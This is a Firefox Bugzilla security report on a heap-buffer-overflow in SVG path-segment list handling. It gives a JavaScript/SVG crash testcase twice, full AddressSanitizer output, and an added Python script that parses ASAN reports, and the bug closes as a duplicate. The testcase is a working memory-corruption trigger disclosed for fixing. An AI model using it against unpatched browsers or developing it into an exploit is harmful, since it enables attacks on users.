Closed Bug 1430560 Opened 6 years ago Closed 6 years ago

heap-buffer-overflow in mozilla::DOMSVGPathSeg::RemovingFromList

Categories: Core :: SVG, defect
Version: 59 Branch
Type: defect
Priority: Not set
Severity: normal

Tracking: RESOLVED DUPLICATE of bug 1430557
Tracking Status: firefox59 --- affected

People: Reporter: nils, Unassigned

Details: Keywords: csectype-bounds

Attachments: 2 files

The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=21ddfb9e6cc008e47da89db50e22697dc7b38635).

<script>  
  o399=document.createElementNS('http://www.w3.org/2000/svg','path');
  o399.setAttribute('d', 'M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z');
  o782=o399.createSVGPathSegLinetoVerticalRel(4);
  o820=o399.animatedPathSegList;
  o670=o399.createSVGPathSegLinetoVerticalAbs(15);
  o1058=o399.pathSegList;
  for(var x=0; x<47; x++) o820[x];
  o1058.replaceItem(o782,35);
  o1058.insertItemBefore(o670,28);
  o1058.clear();
</script>

ASAN output:
=================================================================
==30545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800001fb90 at pc 0x0000004bdf99 bp 0x7ffcec556870 sp 0x7ffcec556020
READ of size 16 at 0x61800001fb90 thread T0 (file:// Content)
    #0 0x4bdf98 in __asan_memcpy /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
    #1 0x7fdae91fcdad in mozilla::DOMSVGPathSeg::RemovingFromList() /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSeg.cpp:114:3
    #2 0x7fdae922bffb in mozilla::DOMSVGPathSegList::InternalListWillChangeTo(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:205:24
    #3 0x7fdae922cca1 in mozilla::DOMSVGPathSegList::Clear(mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:289:19
    #4 0x7fdae6c5d267 in mozilla::dom::SVGPathSegListBinding::clear(JSContext*, JS::Handle<JSObject*>, mozilla::DOMSVGPathSegList*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/SVGPathSegListBinding.cpp:61:9
    #5 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #6 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #7 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #8 0x7fdaee9e3d07 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2559:14
    #9 0x233ad890252a  (<unknown module>)

0x61800001fb90 is located 0 bytes to the right of 784-byte region [0x61800001f880,0x61800001fb90)
allocated by thread T0 (file:// Content) here:
    #0 0x4bed33 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fdae2b623c8 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:196:46
    #2 0x7fdae2b623c8 in nsTArrayFallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayFallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayFallibleAllocator>(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
    #3 0x7fdae718b2c7 in float* nsTArray_Impl<float, nsTArrayFallibleAllocator>::ReplaceElementsAt<float, nsTArrayFallibleAllocator>(unsigned long, unsigned long, float const*, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2025:47
    #4 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator, nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1252:9
    #5 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1261
    #6 0x7fdae92c0c43 in mozilla::SVGPathData::CopyFrom(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/SVGPathData.cpp:37
    #7 0x7fdae925d9ed in mozilla::SVGAnimatedPathSegList::SetBaseValueString(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/svg/SVGAnimatedPathSegList.cpp:57:27
    #8 0x7fdae932b296 in nsSVGElement::ParseAttribute(int, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, nsAttrValue&) /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:422:20
    #9 0x7fdae5b3755c in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2608:8
    #10 0x7fdae5b36950 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:894:12
    #11 0x7fdae5b36950 in mozilla::dom::Element::SetAttribute(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsIPrincipal*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/Element.cpp:1348
    #12 0x7fdae777ac88 in mozilla::dom::ElementBinding::setAttribute(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:1167:9
    #13 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #14 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #15 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #16 0x7fdaee77dd56 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #17 0x7fdaee77dd56 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #18 0x7fdaee764700 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #19 0x7fdaee795cc1 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:706:15
    #20 0x7fdaee79645f in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:738:12
    #21 0x7fdaef28f1e6 in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4712:12
    #22 0x7fdae5e77846 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
    #23 0x7fdae9c7caad in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2268:25
    #24 0x7fdae9c76d39 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1911:10
    #25 0x7fdae9c740a3 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1555:10
    #26 0x7fdae9c589fe in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1293:10
    #27 0x7fdae9c57b19 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:147:18
    #28 0x7fdae4c9a84b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:246:18
    #29 0x7fdae4c9a84b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
    #30 0x7fdae4c93ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
    #31 0x7fdae4ca013b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
    #32 0x7fdae2bce710 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:395:25
    #33 0x7fdae2bf670d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #34 0x7fdae2c114e0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #35 0x7fdae3a9c63a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #36 0x7fdae39f3f29 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #37 0x7fdae39f3f29 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #38 0x7fdae39f3f29 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c307fffbf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fffbf70: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffbf90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbfa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbfc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==30545==ABORTING
Attached file ASAN output
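Added here as a worked example for triaging reports like the one above (this is not code from the bug or from Mozilla): a small Python parser that pulls the access, region and stack information out of an ASAN report and computes what the raw text does not state directly, namely how far past the end of the region the read lands and, because the allocation stack shows an nsTArray of float, how many elements that is. The embedded sample is a trimmed copy of the report in this bug. The element-size table and the frame-filtering heuristic (treating compiler-rt and nsTArray frames as noise when picking the frame to blame) are assumptions of this example.

```python
import re

# Constructed sample: these lines are copied from the ASAN report in the bug
# above, with the JS-engine and event-loop frames trimmed away.
SAMPLE_REPORT = """\
==30545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800001fb90 at pc 0x0000004bdf99 bp 0x7ffcec556870 sp 0x7ffcec556020
READ of size 16 at 0x61800001fb90 thread T0 (file:// Content)
    #0 0x4bdf98 in __asan_memcpy /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
    #1 0x7fdae91fcdad in mozilla::DOMSVGPathSeg::RemovingFromList() /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSeg.cpp:114:3
    #2 0x7fdae922bffb in mozilla::DOMSVGPathSegList::InternalListWillChangeTo(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:205:24
    #3 0x7fdae922cca1 in mozilla::DOMSVGPathSegList::Clear(mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:289:19

0x61800001fb90 is located 0 bytes to the right of 784-byte region [0x61800001f880,0x61800001fb90)
allocated by thread T0 (file:// Content) here:
    #0 0x4bed33 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fdae2b623c8 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:196:46
    #3 0x7fdae718b2c7 in float* nsTArray_Impl<float, nsTArrayFallibleAllocator>::ReplaceElementsAt<float, nsTArrayFallibleAllocator>(unsigned long, unsigned long, float const*, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2025:47
    #6 0x7fdae92c0c43 in mozilla::SVGPathData::CopyFrom(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/SVGPathData.cpp:37

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
"""

ERROR_RE = re.compile(r"^==(\d+)==ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)")
REGION_RE = re.compile(r"^0x[0-9a-f]+ is located (\d+) bytes to the (left|right) of "
                       r"(\d+)-byte region \[(0x[0-9a-f]+),(0x[0-9a-f]+)\)")
# "#N 0xADDR in <function, may contain spaces> <file:line[:col]>"
FRAME_RE = re.compile(r"^\s*#\d+\s+0x[0-9a-f]+\s+in\s+(.+?)\s+(\S+)\s*$")

# Assumed element sizes for container types recognised in the allocation stack.
ELEMENT_SIZES = {"float": 4, "double": 8, "int": 4, "char": 1}


def parse_frames(lines):
    """Collect (function, location) pairs up to the next blank line."""
    frames = []
    for line in lines:
        if not line.strip():
            break
        m = FRAME_RE.match(line)
        if m:
            frames.append((m.group(1), m.group(2)))
    return frames


def is_noise(func, loc):
    # Sanitizer runtime and container internals are not where the bug lives
    # (heuristic assumed by this example).
    return "compiler-rt" in loc or "nsTArray" in loc or func in ("malloc", "Malloc")


def first_interesting(frames):
    return next(((f, l) for f, l in frames if not is_noise(f, l)), (None, None))


def triage(report):
    lines = report.splitlines()
    info, crash_frames, alloc_frames = {}, [], []
    for i, line in enumerate(lines):
        m = ERROR_RE.match(line)
        if m:
            info["pid"], info["kind"], info["address"] = int(m[1]), m[2], int(m[3], 16)
            continue
        m = ACCESS_RE.match(line)
        if m:
            info["access"], info["access_size"] = m[1], int(m[2])
            crash_frames = parse_frames(lines[i + 1:])
            continue
        m = REGION_RE.match(line)
        if m:
            info["region_size"] = int(m[3])
            info["region_start"], info["region_end"] = int(m[4], 16), int(m[5], 16)
            continue
        if line.startswith("allocated by thread"):
            alloc_frames = parse_frames(lines[i + 1:])

    addr, size = info["address"], info["access_size"]
    start, end = info["region_start"], info["region_end"]
    # How many of the accessed bytes fall outside [start, end).
    info["offset_from_region_start"] = addr - start
    overlap = max(0, min(addr + size, end) - max(addr, start))
    info["bytes_out_of_bounds"] = size - overlap

    info["crash_function"], info["crash_location"] = first_interesting(crash_frames)
    info["alloc_function"], info["alloc_location"] = first_interesting(alloc_frames)

    # If the buffer came through nsTArray_Impl<T>, restate the numbers in
    # elements of T, which is the unit the overrunning code was thinking in.
    for func, _ in alloc_frames:
        m = re.search(r"nsTArray_Impl<(\w+)", func)
        if m and m[1] in ELEMENT_SIZES:
            esz = ELEMENT_SIZES[m[1]]
            info["element_type"] = m[1]
            info["region_elements"] = info["region_size"] // esz
            info["first_element_touched"] = (addr - start) // esz
            info["elements_touched"] = size // esz
            break
    return info


def summarize(info):
    s = (f"{info['kind']}: {info['access']} of {info['access_size']} bytes at offset "
         f"{info['offset_from_region_start']} into a {info['region_size']}-byte region "
         f"({info['bytes_out_of_bounds']} bytes past the end) in {info['crash_function']}; "
         f"allocated in {info['alloc_function']}")
    if "element_type" in info:
        s += (f"; that is {info['elements_touched']} {info['element_type']}(s) starting at "
              f"index {info['first_element_touched']} of {info['region_elements']}")
    return s


if __name__ == "__main__":
    print(summarize(triage(SAMPLE_REPORT)))
```

Run on the sample, the summary says the 16-byte memcpy starts at element 196 of a 196-float array, so every byte of the read is out of bounds, which matches the shadow-byte dump above (the `[fa]` heap redzone begins exactly at the faulting address). It also ties the two halves of the report together: the array was filled by SVGPathData::CopyFrom when setAttribute('d', ...) parsed the path, and the read happens in DOMSVGPathSeg::RemovingFromList, reached from the testcase's final clear() via InternalListWillChangeTo.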
Jonathan, is this something you could investigate? Thanks.
Group: core-security → layout-core-security
Flags: needinfo?(jwatt)
Keywords: csectype-bounds
This is the same underlying problem as bug 1430557. See bug 1430557 comment 3.
Status: NEW → RESOLVED
Closed: 6 years ago
Flags: needinfo?(jwatt)
Resolution: --- → DUPLICATE
For posterity, here's the testcase from this bug with meaningful variable names:

<script>
  path = document.createElementNS("http://www.w3.org/2000/svg", "path");
  path.setAttribute("d", "M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z");

  baseList = path.pathSegList;
  animList = path.animatedPathSegList;

  line1 = path.createSVGPathSegLinetoVerticalRel(4);
  line2 = path.createSVGPathSegLinetoVerticalAbs(15);

  for(var x=0; x<47; x++) {
    animList[x];
  }

  baseList.replaceItem(line1, 35);
  baseList.insertItemBefore(line2, 28);
  baseList.clear();
</script>
Flags: sec-bounty?
Minusing for a bounty since it is the same underlying issue as bug 1430557.
Flags: sec-bounty? → sec-bounty-
Group: layout-core-security